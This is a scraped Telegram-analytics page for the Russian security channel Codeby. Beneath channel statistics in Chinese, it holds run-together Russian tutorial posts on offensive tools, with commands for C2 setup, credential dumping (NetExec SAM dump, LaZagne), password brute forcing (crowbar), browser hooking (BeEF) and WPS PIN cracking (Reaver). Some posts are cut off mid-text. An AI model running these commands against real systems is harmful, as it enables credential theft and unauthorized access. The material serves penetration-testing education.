Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
显示更多📈 Telegram 频道 Codeby 的分析概览
频道 Codeby (@codeby_sec) 俄语 语言赛道中的 是活跃参与者。目前社区聚集了 36 579 名订阅者,在 技术与应用 类别中位列第 3 750,并在 俄罗斯 地区排名第 17 801 位。
📊 受众指标与增长动态
自 невідомо 创建以来,项目保持高速增长,吸引了 36 579 名订阅者。
根据 09 六月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 199,过去 24 小时变化为 2,整体触达仍然可观。
- 认证状态: 未认证
- 互动率 (ER): 平均受众互动率为 7.71%。内容发布后 24 小时内通常能获得 4.19% 的反应,占订阅者总量。
- 帖子覆盖: 每篇帖子平均可获得 2 819 次浏览,首日通常累积 1 534 次浏览。
- 互动与反馈: 受众积极参与,单帖平均反应数为 19。
- 主题关注点: 内容集中在 edr, api, вектор, mitre, att&ck 等核心主题上。
📝 描述与内容策略
作者将该频道定位为表达主观观点的平台:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
凭借高频更新(最新数据采集于 10 六月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。
SSTImap — это специализированный инструмент, предназначенный для выявления и эксплуатации уязвимостей Server-Side Template Injection (SSTI) в веб-приложениях. SSTI является одним из серьезных видов атак, которые позволяют злоумышленникам внедрять и исполнять произвольный код на стороне сервера через уязвимые шаблонизаторы. Этот инструмент упрощает процесс анализа безопасности веб-приложений, выявляя уязвимости, связанные с обработкой шаблонов.Основные возможности SSTImap 1️⃣ Обнаружение уязвимостей SSTI SSTImap сканирует входные точки приложения, которые могут быть подвержены атаке SSTI. Это позволяет быстро определить, какие параметры или запросы являются потенциально небезопасными. 2️⃣ Поддержка популярных шаблонизаторов Утилита поддерживает работу с различными движками шаблонов, включая: ▪️ Jinja2 (Python) ▪️ Twig (PHP) ▪️ Velocity (Java) ▪️ Smarty (PHP) ▪️ Freemarker (Java) ▪️ И другие. 3️⃣ Автоматизация проверки Инструмент позволяет автоматизировать процесс проверки на наличие уязвимостей, используя заранее определенные полезные нагрузки для каждого типа движка шаблонов. 4️⃣ Эксплуатация уязвимостей SSTImap может выполнять безопасную эксплуатацию для подтверждения уязвимости. Например, он способен внедрить команды, чтобы определить, насколько опасен выявленный вектор. Установка SSTImap ➡️ Клонирование репозитория
git clone https://github.com/epinna/SSTImap.git
cd SSTImap
➡️ Установка зависимостей
pip install -r requirements.txt
➡️ Запуск утилиты
python sstimap.pygit clone https://github.com/urbanadventurer/username-anarchy
🚀 Характеристики:
⏺️Плагинная архитектура;
⏺️Подстановки при неполных данных;
⏺️Определения формата имени пользователя через строки формата;
⏺️Базы данных стран с распространенными именами и фамилиями из Familypedia и PublicProfiler, что позволяет автоматически генерировать username заданной страны.
✏️ Примеры использования:
1️⃣ Известно только имя пользователя, а формат логина нет:
./username-anarchy vasya ivanov
2️⃣ Знаем формат имени пользователя и сами имена (передаем списком в файле):
./username-anarchy --input-file ./test-names.txt --select-format first.last
Полный список поддерживаемых утилитой форматов можно узнать командой ./username-anarchy --list-formats
3️⃣ Знаем, что тестируемая организация находится в определенной стране (например, Китай). Программа автоматически сгенерирует список username характерных для заданного региона с разными форматами логинов:
./username-anarchy --country china --auto
4️⃣ Автоматическое распознавание используемого формата имени пользователя:
./username-anarchy --recognise v.ivanov
Используя флаг -F, можно определять собственный формат имени пользователя.git clone https://github.com/BC-SECURITY/Starkiller
cd Starkiller
🖥Запуск:
startkiller💡Утилита сама запустит вам браузер по адресу http://localhost:1337/index.html#/ ⏺️Нас встречает окно авторизации, входим:
login: empireadmin password: password123💡Теперь вы имеете удобный интерфейс для использования утилиты Powershell-empire, о котором мы писали ранее.
git clone https://gitlab.com/kalilinux/packages/powershell-empire
🖥Запуск:
sudo powershell-empire -h
⏺️Команда ниже, запустит сервер powershell-empire:
sudo powershell-empire server
⏺️А такой командой мы сможем подключиться к клиенту:
sudo powershell-empire client
📌Далее нам предоставляется выбор "Слушателя", который принимает от нас команды:
uselistener http⏺️Синтаксис схож с Metasploit-Framework, мы можем менять параметры:
set Name AllesGut
set Port 80
⏺️Для запуска пишем:
execute⏺️или мы можем запустить чат простой командой:
chat
sudo responder -I {NETWORK_INTERFACE*} -w On -r On -f On
Где, -I - IP-адрес для перенаправления, -w On - включаем проекси-сервер WPAD, -r On - ответы для netbios wredir, -f On - снятие отпечатков пальцев.
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
🖥Запуск:
⏺️Для проверки активных хостов и открытых портов, пишем команду:
netexec smb 127.0.0.1
⏺️Чтобы посмотреть активные сеансы:
netexec smb 127.0.0.1 -u {USERNAME} -p {PASSWORD} --sessions
⏺️NetExec также способен выполнять атаки по сбору паролей и учетных данных:
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST}
⏺️С помощью ключа -x мы можем выполнять команды:
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST} -x 'net localgroup administrators'
⏺️Создание дампа базы данных SAM
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST} --samlaZagne.exe all -oNЗапуск только определенного скрипта для браузера c целью извлечения паролей из firefox:
laZagne.exe browsers -firefox
Для расшифровки учетных данных домена можно указать пароль пользователя Windows, иначе будут перебраны уже найденные пароли Windows:
laZagne.exe all -password pass-v - увеличить уровень детализации -quiet - тихий режим без вывода информации на экран Для извлечения Wi-Fi паролей\секретов Windows необходимо запускать программу с правами администратора. В случае запуска с административными привилегиями LaZagne удаётся получить пароли для других пользователей. В Mac OS без пароля пользователя сложно восстановить пароли, хранящиеся на компьютере, поэтому рекомендуется запускать утилиту передавая её учетные данные пользователя. 💻Установить исполняемый файл можно здесь
Присоединяйтесь к Академии Кодебай – защищайте мир от угроз, находя уязвимости и предотвращая кибератаки!🚀 По всем вопросам пишите @Codeby_Academy
sudo apt install -y beef-xss
📌Запуск:
sudo beef-xss
Устанавилваем пароль для нового пользователя beef
Далее запускается демон beef и ссылка на порт на котором он запущен с web UI.
Для того чтобы "поймать браузер", используем демо страницу:
http://localhost:3000/demos/butcher/index.htmlДалее вы увидите браузер в директории "Online Browsers" в левом углу программы. Новая вкладка представляет подробности по браузеру, подцепленную страницу и подцепленный хост, а также обеспечивает новое меню из вкладок по выбранному браузеру. 📎Модули имеют 3 цвета: Зелёный - Он работает на выбраном браузере, работаем! Ораньжевый - Он будет работать, но пользователь может это выявить. Красный - На этом браузере модуль не сработает! 💡С помощью этого иструмента вы сможете: 1️⃣Осуществить сбор информации - Отпечатки браузеров, Информация, которую BeEF собирает по умолчанию с подцепленного браузера, Сбор информации о системе, Результат модуля Get System, Отпечатки пользовательского поведения 2️⃣Осуществить атаку методом социальной инженерии - Запрос учётных записей, Перенаправление на другую страницу.
sudo apt install -y feroxbuster
2️⃣
git clone https://github.com/epi052/feroxbuster
📌Запуск:
feroxbuster💡Для перебора директорий и файлов, используем такую команду:
feroxbuster --url http://localhost:80/
💡Для перебора файлов с расширениями, используем команду с таким ключём:
feroxbuster --url http://localhost:80/ -x php
💡Для фильтрации кода ответа сервера, используйте команду с таким ключём:
feroxbuster --url http://localhost:80/ --filter-status 200
💡Для очень детального анализа, используйте такой ключ:
feroxbuster --url http://localhost:80/ --extract-links
💡Чтобы отфильтровать вывод по словам, используйте такую команду:
feroxbuster --url http://localhost:80/ -W 5
Это не весь функционал этой утилиты, он намного обширнее!
https.get и https.request, для кражи данных или удалённого управления.
6️⃣ 537 пакетов с пустыми описаниями, что ещё больше скрывает их истинные намерения и повышает риск незамеченной вредоносной активности.
7️⃣ 164 пакета с необычно высокими номерами версий, которые вводят пользователей в заблуждение, заставляя их доверять устаревшему или потенциально опасному программному обеспечению.sudo apt install -y crowbar
2️⃣
git clone https://github.com/galkan/crowbar
pip3 install -r requirements.txt
➡️Запуск:
crowbar --help
🖥Для подбора пароля для SSH используем такую команду:
crowbar -b sshkey -k ~/.ssh/id_rsa -u kali -s 127.0.0.1/32
Где, -b - это то, что мы будем брутить -k - конфигурационный файл (в нашем случае id_rsa) -u - имя пользователя -s - сервер куда мы подключаемся🖥Для подбра пароля для RDP используем такую команду:
crowbar -b rdp -s 127.0.0.1/32 -u Windowz -c 12345six
Где, -c - это пароль💡Для указания файла нужно использовать заглавные буквы в ключах (-C /path/to/wordlist)
Reaver WPS Fork t6x — это инструмент для проведения атак на WPS (Wi-Fi Protected Setup), который помогает находить слабости в Wi-Fi сетях с включённой функцией WPS. Этот форк улучшает оригинальную утилиту Reaver, добавляя стабильность, производительность и новые функции.➡️ Как работает Reaver? Основной принцип работы Reaver заключается в переборе PIN-кодов WPS до нахождения правильного, что позволяет получить доступ к настройкам маршрутизатора и извлечь WPA/WPA2 пароль. 1️⃣ Идентификация цели Перед началом атаки Reaver использует утилиту wash для поиска Wi-Fi сетей с включённой функцией WPS. Вы можете получить список доступных сетей, чтобы выбрать цель для тестирования. 2️⃣ Перебор PIN-кодов Reaver последовательно отправляет PIN-коды к маршрутизатору, используя механизмы WPS. Атака разделяется на две части: • Перебор первых 4 цифр PIN-кода. • Перебор последних 3 цифр. Такой подход значительно сокращает общее количество комбинаций. 3️⃣ Обход защит Некоторые маршрутизаторы применяют защиту, блокируя WPS после нескольких попыток. Форк t6x добавляет функции, которые позволяют обходить эти механизмы: • Задержки между попытками. • Использование фальшивых MAC-адресов. • Автоматическое возобновление атаки после блокировки. 4️⃣ Извлечение WPA/WPA2 пароля После успешного подбора PIN, Reaver извлекает пароль сети, что позволяет подключиться к Wi-Fi. ➡️ Установка и настройка Reaver Утилита устанавливается из исходного кода с GitHub
sudo apt install build-essential libpcap-dev aircrack-ng git
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x/src
./configure
make
sudo make install
➡️ Пример использования wash и reaver
🔍 Сканирование сетей с помощью wash
root@kali:~# wash -i wlan0mon -c 6 -C BSSID Ch dBm WPS Lck Vendor ESSID ------------------------------------------------------ E0:3F:49:6A:57:78 6 -73 1.0 No Unknown ASUS-i - выбор интерфейса для сканирования -с - выбор канала -С - игнорирование ошибок контрольной суммы кадров 🦴 Пример использования reaver
root@kali:~# reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Waiting for beacon from E0:3F:49:6A:57:78 [+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS) [+] Trying pin 12345670-i - выбор интерфейса -b - MAC адрес цели -v - более подробный вывод процесса работы
现已上线!2025 年 Telegram 研究 — 年度关键洞察 
